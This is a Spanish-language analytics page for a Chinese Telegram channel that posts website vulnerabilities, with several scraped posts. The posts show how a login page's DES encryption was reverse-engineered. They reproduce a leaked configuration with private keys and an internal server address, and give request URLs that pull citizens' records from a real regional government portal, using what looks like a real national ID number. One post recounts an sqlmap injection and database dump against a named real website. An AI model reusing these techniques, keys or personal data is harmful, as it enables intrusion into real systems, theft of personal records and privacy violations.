BYSGS会所---网站漏洞公布
频道主: @KHCHADANG 双向机器人: @SHANGGANSHEN_bot 我的接口频道: https://t.me/BYJIEKOSHEN 我的数据频道: https://t.me/SGSSHUJUKU 我的技术频道: https://t.me/HackerCCTV 我的倾诉频道: https://t.me/SGSYYDSNB 我的倾诉群聊: https://t.me/NNSGSYYDS 记住我的名字就好 我是个极度厌世的人
Mostrar más📈 Análisis del canal de Telegram BYSGS会所---网站漏洞公布
El canal BYSGS会所---网站漏洞公布 (@hackercctv) en el segmento lingüístico de Chino es un actor destacado. Actualmente la comunidad reúne a 14 206 suscriptores, ocupando la posición 8 705 en la categoría Tecnologías y Aplicaciones y el puesto 14 832 en la región China.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 206 suscriptores.
Según los últimos datos del 27 septiembre, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de -242, y en las últimas 24 horas de -30, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 0%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 0 visualizaciones. En el primer día suele acumular 0 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 0.
- Intereses temáticos: El contenido se centra en temas clave como module.classloader, url, parent, resources.context, webshell.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“频道主: @KHCHADANG
双向机器人: @SHANGGANSHEN_bot
我的接口频道: https://t.me/BYJIEKOSHEN
我的数据频道: https://t.me/SGSSHUJUKU
我的技术频道: https://t.me/HackerCCTV
我的倾诉频道: https://t.me/SGSYYDSNB
我的倾诉群聊: https://t.me/NNSGSYYDS
记住我的名字就好 我是个极度厌世的人”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 28 septiembre, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
晚安,伤肝肾
比如: asdfgh 123456 rsa: asdfgh123456LT-13945240-9LF60zXoWKigsdvdrDDoK6Dtuf3R3c-tpass lt: LT-13945240-9LF60zXoWKigsdvdrDDoK6Dtuf3R3c-tpass但是内部是有处理的 前端的JOUERY的框架有 $("#rsa").val(u+p+lt); 这样的内容 通过快捷搜索也可以看到 enc 内容 u : strEnc(u , '1' , '2' , '3') , p : strEnc(p , '1' , '2' , '3') 经过跳转就可以看到 var leng = data.length; var encData = ""; var firstKeyBt,secondKeyBt,thirdKeyBt,firstLength,secondLength,thirdLength; 这样的内容 基本上我们也知道了他的核心点
DES加密和解密 $.post("device" , { d : murmur , d_s : murmur_s , d_md5 : murmur_md5 , m : '1' , u : strEnc(u , '1' , '2' , '3') , p : strEnc(p , '1' , '2' , '3')===================
function finallyPermute(endByte){...} function getBoxBinary(i):string generate 16 keys for xor...*/ function generateKeys(keyByte){...} Lt ="LT-2849329-7aTZ9hI9pcopicc94KCncYNzpDFXHG-tpass" U= "测试内容"I p= "测试内容" u2 = strEnc(u,firstKey:'1* secondKey:'2', thirdKey:'3') p2 =strEnc(p, firstKey:"1* secondKey:"2', thirdKey:'3') console.log(u2) console.log(p2)
#登录所用的公钥 login_publicKey = 047a877a8fb4a8174f6d85659f06c5d266d5ca18f417cb858583fd008616b36c3bb5a8d10a954eb38ea62a0026c008302614ae968903eb7a3d1514602fd6b64cb5
#登录所用的私钥 #login_privateKey = b3abbd79d78692ef4b2fd27989c9c33aa5e7d6b43fa8c4b873985e148910d136
#前端接口加解密公钥和私钥 #encrypt_public_key=0460ff66ae5bbcf43ceab417632ed56400c730126b2f59da55f87f34c674bc728224d51620c67567b10bd7391a3f0698fe6d1eaa73f81168ef7a95836bdf05e19a decrypt_private_key=6d8699e0fc0ef912c3c82cdcd81b2f4ac27608643bc582508779b338877f90b4
#随州电子证照地址 (全省) dzzz_url=http://172.16.4.4:8090
#为某个流程配置子模块 djlxChildren_111310=个人房屋抵押,企业房屋抵押 djlxChildren_140319 = 企业不动产抵押注销登记,个人不动产抵押注销登记 djlxChildren_130300,41 = 个人新房办证(全款),企业新房办证(全款) djlxChildren_190303 = 企业不动产权属证书遗失补办登记,个人不动产权属证书遗失补办登记,企业不动产权属证书换证登记,个人不动产权属证书换证登记 djlxChildren_190308 = 个人不动产证明遗失补办,企业不动产证明遗失补办
#需判断证号所对应的权利人和当前账号是否一致 qlrisconsistent=113100,190303,190308 #证书查验当前登录人信息是否需要回填0否1是 isbackfill=0===============================
#为某个流程配置子模块 djlxChildren_111310=个人房屋抵押,企业房屋抵押 djlxChildren_140319 = 企业不动产抵押注销登记,个人不动产抵押注销登记 djlxChildren_130300,41 = 个人新房办证(全款),企业新房办证(全款) djlxChildren_190303 = 企业不动产权属证书遗失补办登记,个人不动产权属证书遗失补办登记,企业不动产权属证书换证登记,个人不动产权属证书换证登记 djlxChildren_190308 = 个人不动产证明遗失补办,企业不动产证明遗失补办
https://zwfw.nmg.gov.cn/elec/namelist?name=空查询如:
件办理\"},{\"defineAuthorityName\":\"中华人民共和国公安部\",\"certificateHolderCategory\":\"1\",\"subjectId\":\"8FBEB09982DCF90FE050817B0CFE27AB\",\"certificateTypeName\":\"户口迁移证\",\"validityRange\":\"长期选择好 电子证照 我们去 https://zwfw.nmg.gov.cn/personal_center/getPersonCard?curr=1&pageSize=10®ionCode=&keyword=&_=1766256805566 ============= 知道: 内蒙古政务服务网个人中心证照接口链接,需登录 + 通过官网入口访问
({"msg":"success","state":200,"data":{"head":{"message":"未找到匹配的证照信息","status":"10"},"data":{"total":0,"size":0,"page":0,"cell":null}}})重点 重点 重点 重点 回到查询个人证照: https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do 互联网政务服务门户后台管理系统 我们需要一个完整的 请求方式
申请人证件号码 申请人 材料唯一标识 ID 材料 网上办件 ID
{ "链接用途": "内蒙古政务服务网材料库信息查询接口", "参数列表": [ { "参数名": "applicantCardNumber", "参数值": "150428199212114715", "含义": "申请人证件号码(18位身份证号)" }, { "参数名": "materialOid", "参数值": "ff8080817de68dd1017dea2074b952e0", "含义": "材料唯一标识ID(系统内部定位具体材料)" }, { "参数名": "netCaseId", "参数值": "8a8c970a9b2f8544019b3d0b667b232f", "含义": "网上办件ID(对应具体政务申请记录)" } ] }我们知道了 模板url
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do?applicantCardNumber=内容一&materialOid=内容二&netCaseId=内容三我们回到上面的 第一个url 通过证照 我们可以获得 materialOid 和 netCaseId 两个参数假设参数是
材料唯一标识ID ff8080817de68dd1017dea2074b952e0
网上办件ID 8a8c970a9b2f8544019b3d0b667b232fapplicantCardNumber 证件号 我们用 150428199212114715 来演示 组合起来我们可以获得这样一个url
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do?applicantCardNumber=150428199212114715&materialOid=ff8080817de68dd1017dea2074b952e0&netCaseId=8a8c970a9b2f8544019b3d0b667b232f如图 还有更多的玩法 自行发觉 ps: 好消息内蒙古名下证照 坏消息 内蒙古人不上网
PHP 5.2.17, Apache,MySQL >= 5.0.12
在对目标进行信息收集中,发现 http://eflybird.com/products_list.php?nid=19 这个URL存在注入风险,毕竟依赖后端嘛wwww
sqlmap一扫果然有货(依旧御三家,我是不是不应该再玩sql注入了?换一个别的玩玩?)一个一个布尔盲注、一个联合注入,因为联合查询的存在,基本可以判断无WAF,直接开始脱库(本次只脱了一部分)
成功获取数据库,叫bdm252107493_db
其中的user十分肥美啊!(篇幅限制原因这里不展示,自行查看压缩包)
密码还是MD5加密,暴力破解燃尽了,rockyou没出,许愿有人为我破解
总结:很典的sql注入,不过多解释了。对了我就是个渗透兴趣爱好者,我玩玩这种小站就好~
作者: @Yuhui_ddos